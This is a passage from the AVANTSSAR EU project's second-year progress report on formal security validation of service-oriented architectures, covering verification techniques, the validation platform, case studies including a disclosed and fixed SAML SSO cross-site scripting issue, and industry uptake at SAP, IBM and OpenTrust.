Channels for Compositional Reasoning. A central concept in ser-vice-oriented architectures is to consider a stack of services orprotocols, i.e., a vertical composition. For instance, one may runan application over a secure connection established using TLS. Infact, in many cases one side (e.g. a client respectively its browser)is not authenticated, and we may rely on an additional layer (e.g.,a password protocol or a third party like in Kerberos or single-sign-on systems) to provide the client authentication.The idea of compositional verification is that instead of verifying acomplex composed system, we verify properties of its componentsindividually and infer by a compositionality theorem that theircomposition preserves their properties. Practically, this allowsus to verify complex systems that could not be verified as wholebut where the individual components are sufficiently simple toverify. Moreover, conceptually, we get more general verificationresults: e.g. one may verify that an application satisfies certainproperties, provided that it is run over a secure channel. Thisresult is independent of the concrete protocol that realizes thesecure channel (e.g., TLS). Vice-versa, we may verify that TLSprovides a secure channel, independent of the application that isrun over it.The ongoing work on channels [25, 26] provides a very useful in-terface for this kind of compositional reasoning. In particular, forseveral kinds of channels, we have defined what it means that aprotocol or service assumes such a channel, and what it meansthat it provides such a channel. By the compositionality theoremwe have proven, any protocol or service that provides a channelcan be “plugged in” into a protocol that assumes this kind of chan-nel. This applies to authentic, confidential and secure channels,as well as their “pseudonymous” counter-parts that are generatedwhen one side is not authenticated (e.g. in TLS without clientauthentication). We are currently working at extensions of the



channel concept (including replay-protection and generalized ex-change methods), and at identifying different sufficient conditionsto satisfy the assumptions of our compositionality theorem.

Observational Equivalence Expressing security properties as obser-vational equivalence properties is particularly suitable for compo-sitional reasoning: one wants to prove that a service or protocol isequivalent to a secure abstraction in any environment. When es-tablished, the observational equivalence allows for the replacementof e.g., a transport protocol by an ideal protocol that has the sameproperties (e.g., authentication, anonymity, . . . ) We have investi-gated a new symbolic method to decide the equivalence of servicesin the presence of a hostile environment. This equivalence gener-alizes static equivalence by allowing for active intruders. Whilewe have so far only considered subterm equational theories, weare currently working on an extensions to a more general class.

WP3.5 Abstraction techniques for composed services and policies.

Data and Control Abstraction. As part of the development of anew module of the OFMC analysis tool, we are currently extendinga popular method to abstract verification of security protocols onwhich for instance also ProVerif and TA4SP are based (see forinstance [Bla01, BHKO04, CLC03]). These techniques involvetwo kinds of abstractions:

• Abstraction from concrete data: we partition the, in general,infinite set of data into finitely many equivalence classes andcompute on the equivalence classes.

• Control Abstraction: we disregard the temporal structure in-duced by the state transition system and rather consider theset of reachable facts, i.e. facts that true in some reachablestate.

Under certain conditions, both abstractions are sound in the sensethat if the original system has an attack then so has the abstractone, but vice-versa, there can be false positives, i.e. attacks tothe abstract system when the original system is safe. In the worstcase, we may this be unable to verify a correct system with thesemethods.We contribute to the abstract verification idea in several regards:



• We use a CEGAR approach, i.e. an automatic refinement ofthe data abstraction when a counter-example is found, basedon the concrete counter-example.

• We use the verification result, an abstract fixed-point thatover-approximates all possible behaviors of the system to builda machine-checkable security proof (see below for details).

• We are currently working on new forms of abstraction that arebetter suited for the verification of web-services, i.e. when thesystem is not a linear exchange of messages as in most securityprotocols.

Generating Machine-Checkable Proofs. When using complex ver-ification tools with advanced methods as in AVANTSSAR, there isof course a significant risk of bugs in the implementations or spec-ifications that fail to meet the subtle assumptions of the employedmethods. It is thus easily possible that an incorrect system is acci-dentally “verified” by an automated tool due to the bug. Our ideais that in case of the abstract fixed-point verification with OFMC,we obtain an finite representation of (an over-approximation of)the possible behavior of the system. We can use this as a basisto produce an actual proof with respect to the original model ofthe system that is to be verified and this proof can be checked bya “neutral” proof checker. IBM and SAP have designed such aproof generation method and implemented a prototype based onOFMC and the theorem prover Isabelle [15]. The key ideas are asfollows:

• Each concrete data item of the reference model is labeled withthe abstract data item that is used in the abstract verificationtechnique (and thus in the computed fixed-point). Note thatthis is a mere annotation that does not change the referencemodel.

• We can define the concretization of the computed (abstract)fixedpoint as the set of all traces T′ that can be built fromfacts of the fixedpoint and replacing each abstract data itemwith any concrete item that is abstracted accordingly.

• We show that T ⊆ T′ for the set of traces T induced by thereference model by showing that T′ is closed under each of theinductive rules that define T.

If the proof is accepted by Isabelle, we can thus be sure that thereference model satisfies the specified properties, provided that



the Isabelle core is correctly implemented, but we do no longerrely on the correctness of any tools and applicability of particularmethods.

Planned Work for Next Period An important effort will be devoted toextending the automated reasoning techniques (and validation back-ends) to cover more general LTL properties. In order to be able toreason on ASLan v.2 specifications, this means also to define propersemantics for policy rules (syntactically expressed as Horn Clauses)and proper analysis techniques. Orchestration techniques should beenhanced in order to capture more general workflows and to be able tobacktrack if some solution is not secure (as detected during the valida-tion phase).

3.1.3 WP4: Validation Platform

Workpackage Objective The objective of this workpackage is to pro-vide a collection of tools implementing the techniques developed in WP2 andWP3. These tools will be integrated in the AVANTSSAR Platform, an auto-matic composition and security analysis platform for Web Services and theirsecurity policies.

Workpackage Achievements

WP4.1 The TS Orchestrator. The TS Orchestrator (Orchestrator, forshort) tries to build an orchestration, i.e. a composition, of the availableservices in a way that is expected (but not yet guaranteed) to satisfythe input policy.The Orchestrator takes as input an ASLan v.1.1 file with a specificationof the available services and either a specification of the client or apartial specification of the goal. It produces as output an ASLan v.1.1file with the specification of the available services, a full specificationof the goal, and a specification of the client (a putative one, if it wasnot given as input).The general idea is to represent the available services and the clientservice as protocol roles. The intruder with Dolev-Yao capabilities, whohas a full control over the network, will play the role of an orchestrator:he tries to lead the given transition system from its initial state to a finalaccepting one. That is why final states are encoded as attack states(the point of view of the intruder). If he succeeds that means that he



is able to satisfy all client’s requests having only initial knowledge ofthe goal service and being able to invoke the available services.In order to check whether the attack state can be reached, we haveemployed a version of the back-end CL-AtSe: the result is a tracecontaining the sequence of messages sent and received by the intruder.From the trace we then extract an executable ASLan v.1.1 specificationof the goal service.

WP4.2 The TS Validator. The TS Validator (Validator, for short) takesas input an orchestration and a security goal formally specified inASLan v.1.1, and automatically checks whether the orchestration meetsthe security goal. If this is the case, then the ASLan v.1.1 specificationof the validated orchestration is given as output, otherwise a counterex-ample is sent back to the Orchestrator.Currently, the functionality of the Validator is supported by the fol-lowing back-ends, which have been improved and extended to providesupport to the ASLan v.1.1 language:

• CL-AtSe (developed and maintained by INRIA),• OFMC (developed and maintained by IBM), and• SATMC (developed and maintained by UGDIST)

WP4.3 Platform Integration. We have developed and implemented thefirst prototype of the AVANTSSAR Validation Platform. A schemaof the platform is presented in Figure 1. The platform takes as in-put a policy stating the functional and security requirements of a goalservice and a description of the available services (including a specifi-cation of their security-relevant behavior, possibly including the localpolicies they satisfy) and aims at building an orchestration of the avail-able services that meet the security requirements stated in the policy.The main components of the platform are the TS Orchestrator and theTS Validator described in the previous subworkpackages. The schemaof Figure 1 refines that given in the Description of Work as it explic-itly includes a connectors layer, i.e. a layer of software modules thatcarry out the translation from application-level specification languages(e.g. BPEL) into the ASLan v.1.1 language (and vice versa). TheASLan v.1.1 language, which was defined in Deliverable D2.1 (“Re-quirements for modelling and ASLan v.1” [AVA08b]), is the input andoutput format of the logical level of the platform. During the secondyear, we focused on this level of the platform. The aspects related to



the connectors layer (i.e. the translation from a high-level language intoASLan v.1.1) will be tackled during the last year.The AVANTSSAR Platform is implemented as a service-oriented ar-chitecture (SOA), where each component service is offered as a WebService. The platform service is hosted by UGDIST and the orches-trator service is hosted by INRIA. We provide three different instancesof the validator service, each of them leveraging a different back-end,developed in WP4.2. In particular, OFMC, CL-AtSe, and SATMC arehosted by UNIVR, INRIA, and UGDIST, respectively.

Planned Work for Next Period The assessment of the AVANTSSAR Plat-form (within WP5.4) against the validation problems will provide valu-able feedback on the usability, effectiveness, and efficiency of the toolswe have been developing in WP4. An important effort will be devotedto integrating in the final version of the platform the improvement ofthe reasoning techniques developed and automated in WP3 and WP4,as result of the assessment phase. During the second year of the projectwe mainly focused on the logical level on which the platform operates.The definition of the connectors to the application level will be ex-plicitly addressed in the Industry Migration workpackage WP6, whichtakes current industrial best practice languages and models into ac-count. The outcome of this work will be integrated in the final versionof the platform. As future work, we plan to fix the current limita-tions of the platform that we have briefly described here and in D4.1.In particular, we will integrate into the Orchestrator the function forgenerating the TS Wrappers.

3.1.4 WP5: Proof of concept

Workpackage Objective The role of WP5 is to select and formalize abroad spectrum of industry-relevant problem cases as ASLan v.1.1/ASLanv.2 specifications and then to validate these specifications using the AVANTS-SAR Validation Platform. This proof of concept approach will provide abenchmark on which we employ and evaluate the concepts, methodologies,techniques, and tools developed in WP2, WP3, and WP4.

Workpackage AchievementsWP 5.1 - Definition of the relevant problem cases. The work on this

subworkpackage has been done mostly in the first year of the project(see Deliverable D5.1 [AVA08c]). A broad collection of industrial rele-vant SOA trust and security problem cases have been extracted from



various application scenarios from strategic application areas includinge-business, e-government, and e-health.

WP 5.2 - Formalization of the problem cases & WP 5.3 - Valida-tion of the problem cases & WP 5.4 - Assessment.The work on formalization and validation of the problem cases has con-tinued with the modeling of the selected cases studies in ASLan v.1.1and ASLan v.2 and with their validation via the AVANTSSAR Vali-dation Platform. Details can be found in Deliverables D2.1 [AVA08b],D2.2 [AVA09b] and D4.1 [AVA09a].Table 1 summarizes the results of the first assessment of the AVANTS-SAR Validation Platform. 6 case studies were formalized and 13 prob-lem cases validated as part of the deployment of the first version of theAVANTSSAR validation platform. Details are provided hereafter forthe problem cases emerging from the selected application scenarios.

E-Business - Banking Services: Loan Origination Process Aversion of the loan origination process (LOP) has been used for the as-sessment of the first version of the AVANTSSAR validation platform.This case study offers the possibility to focus on workflow security as-pects to verify the ability of the platform to spot unexpected behaviorsin the interplay between the workflow and the access control policies.This case study has been formalized in ASLan v.1.1 and validated withSATMC.The LOP describes a bank’s evaluation of a customer’s request for aloan. The access control policy managing the execution of the processtasks that we consider is based on RBAC enhanced with delegation.In addition to delegation of permission which is supported in the LOPversion presented in Deliverable D4.1 [AVA09a], we now support bothdelegation of permissions and delegation of execution [GMM05].The security aspects we have focused on during this year are dataconfidentiality, separation of duty, and binding of duty.Data confidentiality amounts to requiring that sensible data can be ac-cessed only by authorized users. In this context, the validation phaseis used to ensure that some given principals cannot access some confi-dential data. The so-called “forbidden principals” can be users or roles;the latter express the fact that no user having those roles must be ableto access the specified confidential data.



Table 1: Application areas and the related families of problem cases.Legend:of means no formalization has been done yet.f v means formalization has been done.of means orchestration is successful, which implies formalization.f v means verification has been done, which implies formalization.fov means both orchestration and verification, which implies formalization.

Areas Scenarios Families of Problem Cases

Fede

ratio

nAutho

rizationPo

licies

Accou

ntab

ility

TrustMan

agem

ent

Workfl

owSecu

rity

Privacy

App

licationDataPr

otectio

n

Com

mun

icationSe

curit

y

E-Business in general f v f v f v of f v f v f v ofBanking Services f v of of f v of f v ofSW Distribution Services of of of ofAnonymous Shopping f v f v f v

E-Government in general of f v of of fov of fov f vCitizen and Service Portals of f v of of fov of f v f vDocument Exchange Procedures f v of of fov of of

E-Health in general1 f v of f v of of of f vPersonal Health Information of of of of of of

1This includes the SAML SSO scenario, described below, which can be used rather universally.

Separation of duty (SoD) and binding of duty (BoD) are the most com-mon application-level properties that business processes must complywith in order to mitigate business frauds. SoD (respectively, BoD)requires that some critical tasks are executed by different agents (re-spectively, by the same agent).The analysis performed with the AVANTSSAR Validation Platform al-lows one to identify behaviors of the access control policy in places that



are not easy to find without tool support. For instance, delegation mayallow to circumvent the security measures ensuring data confidentiality.The analysis of the LOP is fully supported by SATMC, which is ableto detect violation to the security properties considered. The othertools, OFMC and CL-AtSe, currently support the analysis of a frag-ment of the specification and work is going on to support the wholespecification.

E-Business - Anonymous Shopping: Identity Mixer The Iden-tity Mixer case studies complement the variety of web services that weconsider in AVANTSSAR. The system itself is of interest to the projectas it offers privacy-friendly technology for a broad scope of areas ofservices, such eGovernment, eHealth and the like. For validation, theparticular challenges lie in the use of zero-knowledge proofs as buildingblocks, the privacy goals, and compositionality of the Identity Mixersystem itself.We have formalized two scenarios in ASLan v.2; details of the formal-ization and the rationale behind it are given in [37]. The first scenario isan anonymous shopping scenario where a buyer must prove to be over18 years old by a zero-knowledge proof over its electronic passport. Nomore information than this is revealed to the electronic store (like theactual birthdate or the user’s name). Also, the buyer must store hisreal name in a verifiable encryption: the buyer can check that the en-crypted message is encrypted for a third party and contains the buyer’sreal name from the passport. This allows us to achieve accountability:if anything goes wrong (e.g., the buyer does not pay) the trusted thirdparty can revoke the privacy of the buyer.This scenario addresses the problem cases privacy and accountability.For privacy, we limit ourselves to standard secrecy goals here, i.e. theintruder cannot obtain data from a credential he does not own, but wedo not consider more advanced goals like unlinkability. For account-ability, we verify that (1) after every transaction, the shop has sufficientevidence from which the trusted third party can reveal the real name ofthe shopper (2) this evidence indeed proves the action of the shopper(i.e., it cannot be forged by a malicious shop for instance).The second scenario extends the first one by a frequent customer bonussystem that involves a party vouching for (properties) of a user in aprivacy-friendly way. This scenario addresses the problem case “Fed-eration”. This scenario exists in a first formalization, but has not yet



been extensively tested with the validation tools yet. For this reason,we marked only “formalized” for Federation in the table.

E-Government - Citizen and Service Portals: Car Registra-tion The main focus for the validation work on the Car RegistrationProcess has been the interplay of workflow and access control policies.The workflow orchestration is generated abstracting away from policies,while the validation is performed taking them fully into account. Wehave formalized this case study in ASLan v.1.1 by refining an initialdescription specified in ASLan v.2.The scenario involves a citizen sending a car registration request; this ishandled by an employee on behalf of the registration office, and involvesstorage in a central repository. Access permissions are determined byrole-based local policies and several certificates.The specification of these policies is inspired by the DKAL policy de-scription language. We employ both general rules related to certificates,knowledge and trust, and specific rules describing the local policy ofthe registration office. They are expressed as Horn clauses and thusevaluated locally in every state of the scenario execution.For the abstract model with access control embedded directly into thetransition rules, all three back-ends find an orchestration scenario thatleads to a successful registration. SATMC handles the full model withpolicies as Horn clauses. For the resulting orchestrated system, wevalidate several security properties, e.g., that the documents are secretfor anyone who cannot read the repository, and the documents storedin the repository are consistent, with correct signatures.

E-Government - Document Exchange Procedures: Digital Con-tract Signing This case study, detailed in Deliverable D4.1, has beenmodeled in ASLan v.1.1 assuming two signers and one Business Por-tal. The orchestration problem was to generate a Security Server entityfrom the specification. The tool has been able to obtain a satisfying re-sult in less than 5 seconds working time. The properties to validate thatwere proposed by OpenTrust seem to be guaranteed by the synthetizedSecurity Server, however due to combinatorial explosion CL-AtSe, atool used to validate it, did not finish in reasonable time (36 days, andstill working). An alternative security property was defined, that issecrecy of the contract to sign. In this setting, CL-AtSe has found anattack on this property in a few seconds.



E-Government - Document Exchange Procedures: Public Bid-ding The Public Bidding has been modeled in ASLan v.2, and thenhas been translated to ASLan v.1.1. A particular feature of this casestudy pertains to various list manipulation operations performed bythe participants. The ASLan v.1.1 model had to be simplified (man-ually) in order to reduce the complexity of the model resulting fromthese features. The simplified model has been automatically validatedwith respect to a number of security and functional requirements, andthe AVANTSSAR Orchestrator has been used to generate the desiredbehavior of a bidder entity.

E-Health in general: SAML SSO The work on SAML SSO hasprogressed in the second year of the project. The entire SAML webbrowser SSO profile (see [OAS05b, Section 4.1] for more information)has been formalized in ASLan v.1.1 and validated with SATMC.2

In the scenario supported by the web browser SSO profile, a web usereither accesses a resource at a Service Provider (SP-initiated SSO),or accesses an Identity Provider such that the service provider anddesired resource are understood or implicit (IdP-initiated SSO). Theweb user authenticates (or has already authenticated) to the identityprovider, which then produces an authentication assertion (possiblywith input from the service provider) and the service provider consumesthe assertion to establish a security context for the web user.Both SP-initiated and IdP-initiated SSO can be used in combinationwith the artifact resolution protocol that provides a mechanism bywhich SAML protocol messages can be transported in a SAML bindingby reference instead of by value. The SAML web browser SSO profileis a standardized, open, and interoperable solution. In that respect,it offers a significant number of configuration options that allow thissolution to be applicable in a multitude of environments. This is whySSO solution providers, e.g., SAP, adopt SAML SSO.Besides interoperability, that is a must for nowadays industrial compa-nies running a SOA business model, security is another critical enabler.As a matter of fact, design/development decisions and chosen configu-ration options do have an impact on security.We have formally specified and validated industrial relevant scenar-ios where the SAML SSO services are employed according to the SP-

2Abstract properties of communication channels are so far expressed as predicates thatare currently not supported by the other back-ends.



initiated and IdP-initiated SSO protocols with and without artifactresolution. Around 30 formal specifications capturing these scenariosand the variety of interactions and configuration options have beenwritten and then analyzed.A strange behavior has been discovered on the SAML AuthenticationProtocol used in the SP-initiated SSO interaction where a client mightbe redirected to another SP obtaining a resource he/she never asked.It is not clear whether this strange behavior is a flaw or a desired oneas this depends on the expected security properties of the protocolthat are not fully specified. Interestingly, when combined with lackof sanitization on the RelayState, a URL-encoded parameter oftenused in SAML to carry the original resource requested by the client,this strange behavior has serious consequences as a cross-site scripting(XSS) attack can be mounted by a malicious service provider to stealclient’s session cookies.SAML-based SSO for Google Apps was suffering from this exploitation.Google has been promptly contacted and it fixed the issue by sanitizingthe RelayState. Preliminary results indicate that other adopters of theSAML SSO solution may suffer from the very same issue.The work will proceed during the last year of the project to clarifythese points.

3.1.5 WP6: Dissemination and industry migration

Workpackage Objective This workpackage aims at the disseminationand migration of the project results into the scientific community, industryand standardization bodies.

Workpackage achievementsWP 6.1 - Dissemination. Dissemination activities are described, together

with the use of foreground, in Section 5.

WP 6.2 - Migration to industrial development environments. Con-siderable effort has been devoted to this sub-workpackage in the secondyear of the project.

Industry migration at SAP. Contacts with core business unitsat SAP, the major industrial player active in this sub-workpackage,have been consolidated and two valuable migration activities have beencarried out:



NW-NGSSO: application of AVANTSSAR to formally analyze theSAP NetWeaver SAML Next Generation Single Sign On services.The results obtained by formally analyzing the OASIS SAML 2.0SSO and the SAML-based SSO offered by Google (see [ACC+08])received strong interest at SAP NetWeaver Security and Iden-tity Management (SAP NW SIM). An industry migration activ-ity has been carried out in that context where the AVANTSSARtechnology has been employed to perform a formal analysis ofSAML-based SSO solution that SAP NW SIM has designed anddeveloped. The analysis has focused on the most relevant profile ofSAML for SAP, the SAML web browser SSO profile (see [OAS05b,Section 4.1] for more information).The solution designed and developed at SAP SIM for SAP NetWea-ver Application Server (SAP NW AS) and SAP NetWeaver Iden-tity Management (SAP NW IdM) employes all the features of theIdP Lite and SP Lite operation modes as described in [OAS05a].3In there, clients can consume services by means of either the SP-initiated or the IdP-initiated SSO profiles where artifact resolutioncan be used between SPs and IdPs.In this industry migration initiative, we have exploited the AVANT-SSAR technology to formally analyze SAP-relevant scenarios wherethe SAML-based NW NG SSO services are employed. In our anal-ysis, we wrote more than 50 formal specifications capturing thesescenarios, the variety of configuration options, and the SAP inter-nal design and implementation choices. The analysis conductedwith AVANTSSAR shows that the SAP NW NG SSO services areindeed well designed. In this respect it is worth to be mentionedthat the strange behavior discovered on the SAML AuthenticationProtocol does not have serious exploitations in the SAML-basedNW NG SSO solution as field sanitizations are properly executedand as cookies are in place to mitigate the risk of undesired redi-rections from one service provider to another.All in all, safe and unsafe service compositions and configurationshave been identified by our detailed analysis that can be used bySAP in setting-up the NW NGSSO services on customer produc-tion systems.

3SAP NW IdM 7.2 successfully passed the Liberty SAML2 Interoperability Tests. Seethe press release at http://www.projectliberty.org/news_events/press_releases/entrust_ibm_microsoft_novell_ping_identity_sap_and_siemens_pass_liberty_alliance_saml_2_0_interoperability_testing for more details.



This industry migration initiative is likely to be continued in 2010.A set of interesting future directions have been identified such asanalysis of Single Log Out (SLO) profile, analysis of a compositionof SSO, SLO and a STS (Security Token Service). Discussion withSAP SIM on this matter is taking place right now.

NW-BPM: exploitation of AVANTSSAR technology to formally ana-lyze security-critical aspects of business processes within the SAPNetWeaver BPM product solution. More in detail, the SAP teamin AVANTSSAR proposes an eclipse plug-in extension for SAPNetWeaver BPM (NW BPM) through the design and develop-ment of a security validator plug-in that enables a business processmodeler to easily specify the security goals one wishes to validate.The model-checking verification plug-in is instrumented by a for-mal analysis to ensure, at design time, that a business processachieves its security/compliance desiderata. The tool proposesa push-button technology, featuring an accessible user interface,to bridge the gap between business process modeling languagesand formal method specifications. An automated extraction andcompilation of security-relevant requirements of the process modelhas been realized. An invocation of the SATMC back-end systemcomputes the analysis. As a result, the violation of the securityproperties (if any) are shown in a graphical way to easily enablethe modeler to take counter-measures. Preliminary results havebeen obtained on the Loan Origination Process case study witha few security goals. For the sake of confidentiality, an integra-tion in the SAP existing environment (NetWeaver BPM) will bedemonstrated during the second year review and the results willbe published in the deliverable D6.2.3 (“Migration to industrialdevelopment environment: Lessons learned and best practices”)with a restricted access. This migration activity is likely to becontinued in 2010, with the capture and the analysis of other se-curity relevant aspects of business processes (e.g., invocation andconsumption of remote services) and the assessment of the scala-bility on more complex industrial processes.

Industry migration at IBM.

AnB. As an industrially suited-specification language, IBM has de-veloped AnB, a formal specification language based on Alice andBob notation which is easy to use without a background in for-



mal methods. The novel features as compared to other AnB stylelanguages are the following:

• A formal semantics that allows for the interpretation of AnBspecifications with respect to an algebraic theory (this wasdeveloped independently by [24] and [17], see description ofWP 3.1).

• The support for the notation for secure and pseudonymouschannels [25].

• The support for non-interactive zero-knowledge proofs as a(black-box) specification primitive [37].

Contact with other researchers at IBM that are considering thesecurity of services and protocols and received positive feedback:the language and tool support seems indeed useful and is accessiblewithout expertise in formal logic and model checking. Also theirsuggestions for further extensions are invaluable for continuingthis line of work.

CARL. A new line of work related to Identity Mixer, the case-study ofIBM is pursued in collaboration with the EU-Project PrimeLife:we have devised the new specification language CARL for credent-ial-based access control [34]. The novel aspect of this language isthe ability to specify policies in a privacy friendly way, in particu-lar the minimum amount of information that needs to be revealed(including revealing to third parties). The language is technol-ogy neutral, however, so that established technologies (like X.509certificates) can be used which do not necessarily ensure the levelof privacy that Identity Mixer does (i.e. revealing more informa-tion than required). In relation to AVANTSSAR, we have deviseda formal semantics for this language which is of course a pre-requisite for formal verification of CARL-based systems. We havebegun designing a mapping from CARL specifications to the Iden-tity Mixer technology [37]; this gives a new form of compositionalreasoning, using the Identity Mixer protocols as building blocksof privacy friendly service-oriented architectures.

Industry migration at OpenTrust. OpenTrust was scheduled toperform work on WP 6.2 in 2009 but temporarily postponed the projectwork when the employee responsible for the project left the company.OpenTrust hired a new person to manage the project at the close of2009.



In 2010, OpenTrust will resume its work on WP 6.2 by developing away to implement advanced business processes, such as those dealingwith security policies, and will develop a ready-to-use OpenTrust SPISecurity Server client-side process template. OpenTrust will accom-plish this, in part, by using and improving third-party tools, such asa Business Process Management plug-in, possibly extended. The toolselection may be based open source plug-ins, such as JBoss jBPM orBonita Open Source BPM.The primary purpose of the secured advanced business process projectis to produce a enhanced proof record for document exchange proce-dures. Eventually, OpenTrust’s work will allow users to do the fol-lowing: script a process using a BPM modeler; translate the process toASLan v.1.1 so that it can be validated by the AVANTSSAR Validator,use the AVANTSSAR Validator to validate the process, output processvalidation results that prove the process has been tested and validated,and insert the process validation results into the proof records createdby the OpenTrust SPI Security Server, if required.

WP 6.3 - Migration to standardization bodies. Although the work inthis sub-workpackage was not supposed to start before month 24, amigration activity towards the OASIS standardization group has al-ready been initiated in the first year of the project (modeling of theSP-initiated SAML SSO profile without artifact resolution) and hasprogressed over the second year where the entire SAML web browserSSO profile has been thoroughly studied in preparation for SAML SSOstandardization activities at OASIS.4.Always in this context a SAML Modelling Environment (SAML ME)has been developed as a Java application at SAP Research. The pur-pose was to investigate how AVANTSSAR technology could be ex-ploited to mitigate the risk of deploying flawed SAML services such asthe SAML-based SAML SSO for Google Apps [ACC+08].Though well documented and specified, the OASIS SAML securitystandard is written in natural language that is sometime subject tointerpretation. When several configuration options, profiles, protocols,bindings, exceptions, and recommendations are discussed in differentbut interconnected documents, it may become difficult to establishwhen this and that message fields are mandatory in this and that pro-files and which ones not. The technical overview document provided

4http://saml.xml.org/saml-specifications



Figure 2: The SAML Modeling Environment.

by OASIS SAML as an addendum non-official document tries to in-crease clarity in this respect and, in our humble opinion, indeed doesit. Still something went wrong when Google designed and developedits SAML-based SSO services.Our SAML ME prototype mocks industrial applications built to deploySAML Federated environments (see Figure 2), but features

• a graphical user interface interconnected with a rule engine check-ing that the decided configuration options are coherent with theOASIS SAML specification, and

• a security validation process where the configured federated envi-ronment is formally analysed through the AVANTSSAR Valida-tion Platform.

For instance, if a modeler creates in the SAML ME an identity providerservice and decides to remove the InResponseTo field in the authentica-tion assertion, a message pops-up to warn the modeler that InResponseTois mandatory in the SSO profile (see Figure 3). Notice that the mod-eller may even have good reasons to remove that field. For instance, amodeller may decide to prevent a Denial of Service pitfall by deselect-ing, in the authentication request, the ID field that a service provider is



Figure 3: The SAML Modeling Environment: pop-up warning.

supposed to freshly generate and store upon a client request. But whichare the consequences? In our SAML ME prototype we can instrumenta formal analysis through the AVANTSSAR Validation Platform thatestablish whether this decision can be source of security flaws in theoverall federated environment (see Figure 4).All in all, our SAML ME prototype (i) faithfully captures SAML 2.0 tomitigate the risk of ambiguity that may occur due to different interpre-tation of the specifications and (ii) mitigates, by means of automatedformal analysis, the risk of deploying flawed SAML 2.0 services.A demo about this prototype will be presented at the review meeting.We plan to approach OASIS SAML to openly discuss all these, in ourhumble opinion, interesting points. This will be the main activity that



Figure 4: The SAML Modeling Environment: validation feature.

will take place in the last year of the project.



3.2 ResourcesAs discussed in detail in Section 6, the resources and corresponding costs areall inline with what planned and estimated in the Description of Work, sono deviations have occurred and no countermeasures were required.



4 Deliverables and milestones tables4.1 Deliverables listAs shown in Table 2, the workplan of the project comprises 25 deliverables,3 of which were due in Period P2 in addition to Deliverable D6.1, whichspans the overall lifetime of the project and is of type “O” as it comprises theactivation and maintenance of the AVANTSSARWebsite and the publicationof the package of the AVANTSSAR Platform.

The two deliverables D1.4 (this deliverable) and D2.2 are of nature Report(R), while Deliverable D4.1 is of type “R&P” as it describes the developmentand prototypical implementation of the first version of the AVANTSSARValidation Platform. The dissemination level is indicated using the standardcodes, where PU = Public.

As shown in Table 2, the 4 deliverables due in Period 2 have been deliv-ered in a timely fashion, considering the fact that D1.4 has been merged (inaccordance with the Project Officer) with this report.

Brief descriptions of the individual deliverables are given in the Deliver-able Summary Sheets in the following pages.



Table2:

Deliverab

les

Del.

no.

Deliverab

lena

me

WP

no.

Lead

bene

ficiary

Nature

Dissemination

level

Deliveryda

tefrom

Ann

exI

(projmon

th)

Delivered

Yes/N

oActua

l/Fo

recast

deliv

eryda

teCom

ments

D1.4

Prog

ress/A

ssessm

ent

Rep

ortforYe

ar2

1UNIV

RR

PU12

(31.12.09)

Yes

D1.4ha

sbeenmerged

(inaccordan

cewith

the

Project

Officer)

with

this

repo

rtD2.2

ASL

anv.2with

static

servicea

ndpo

licycom-

posit

ion

2ET

HZu

rich

RPU

18(30.06.09)

Yes

30.06.09

D4.1

AVANTSS

AR

Valid

a-tio

nPlatform

v.1

4UGDIST

R&P

PU24

(31.12.09)

Yes

30.12.09

D6.1

AVANTSS

AR

Websit

ean

dPa

ckag

e6

UNIV

RO

PU1–

36Ye

sThe

website

isbe

ing

upda

tedregu

larly



4.1.1 Deliverable D1.4DELIVERABLE SUMMARY SHEET

Project Number: FP7-ICT-2007-1, Project No. 216471Project Acronym: AVANTSSARTitle: Automated VAlidatioN of Trust and Security of Service-oriented AR-chitecturesDeliverable no: D1.4Title: First Progress/Assessment Report (now: Progress/Assessment Reportfor Year 2 (Period P2: 01.01.09 — 31.12.09))Due date: 31.01.2010Delivery Date: 31.01.2010Short Description: Deliverable D1.4 has been merged (in accordance with theProject Officer) with this Periodic Progress Report, which covers the first yearof the AVANTSSAR project. It consists of a publishable executive summary,of an overview of the project objectives for the period and of the work progressand the achievements during the period, of the deliverables and milestones,of a summary of the project management including an explanation of the useof the resources and the corresponding financial statements.Partners contributed: allMade available to: public




Project Number: FP7-ICT-2007-1, Project No. 216471Project Acronym: AVANTSSARTitle: Automated VAlidatioN of Trust and Security of Service-oriented AR-chitecturesDeliverable no: D2.2Title: ASLan v.2 with static service and policy compositionDue date: 30.06.09Delivery Date: 30.06.09Short Description: Deliverable 2.2 describes ASLan v.2, the second version ofthe ASLan language for specifying security-sensitive service-oriented archi-tectures, the associated security policies, and their trust and security prop-erties. In particular, ASLan v.2 allows for the formal specification of staticservice and policy composition. ASLan v.2 borrows notions from proceduraland objected-oriented programming languages in order to be usable by thosewho are not an expert in formal protocol/service specification languages. Thefollowing features of ASLan v.2 are in particular useful in formally modellingstatic services and policy compositions:

• Control flow constructs (e.g. while and if). These allow for specifyingservices in a concise manner using concepts familiar to most program-mers.

• Modularity via the notion of an entity. This allows for specifyingservices separately, and instantiating them multiple times or composingthem with other services. Moreover, modularity helps in localizingpolicies to individual services, and precisely mapping out their trustrelations.

• Annotated channels. These provide an intuitive notation for expressingproperties of communication channels, that are used both as serviceassumptions and service goals.

The new features of ASLan v.2 are put into practice by formalizing a selectionof problem cases taken from Deliverable D5.1.Partners contributed: UNIVR, ETH Zurich, UGDIST, IBM, IEAT, SAP,SIEMENS (principal editors). INRIA, UPS-IRIT, OpenTrust (secondaryeditors)Made available to: public




Project Number: FP7-ICT-2007-1, Project No. 216471Project Acronym: AVANTSSARTitle: Automated VAlidatioN of Trust and Security of Service-oriented AR-chitecturesDeliverable no: D4.1Title: AVANTSSAR Validation Platform v.1Due date: 31.12.09Delivery Date: 30.12.09Short Description: This deliverable describes the development and prototyp-ical implementation of the AVANTSSAR Validation Platform, which we haveimplemented as a service-oriented architecture. The platform takes as inputa policy stating the functional and security requirements of a goal serviceand a description of the available services (including a specification of theirsecurity-relevant behavior, possibly including the local policies they satisfy)and aims at building an orchestration of the available services that meet thesecurity requirements stated in the policy.The main components of the platform are the TS Orchestrator and the TSValidator. The TS Orchestrator tries to build an orchestration, i.e. a com-position, of the available services in a way that is expected (but not yetguaranteed) to satisfy the input policy. The TS Validator automaticallyanalyses the validation problem resulting from the TS Orchestrator output.Failed validation means the existence of vulnerabilities that need to be fixed;otherwise, the composition of the services is guaranteed to be secure, i.e. tomeet the input policy.We also describe the experimental results obtained by running the platformagainst a selection of problem cases taken from Deliverable D5.1 [AVA08c]formally specified in ASLan.The main features that will be included in the next version of the platformare highlighted.

Partners contributed: UNIVR, ETH Zurich, INRIA, UPS-IRIT, UGDIST,IBM, IEAT (principal editors). OpenTrust, SAP, SIEMENS (secondary ed-itors)Made available to: public




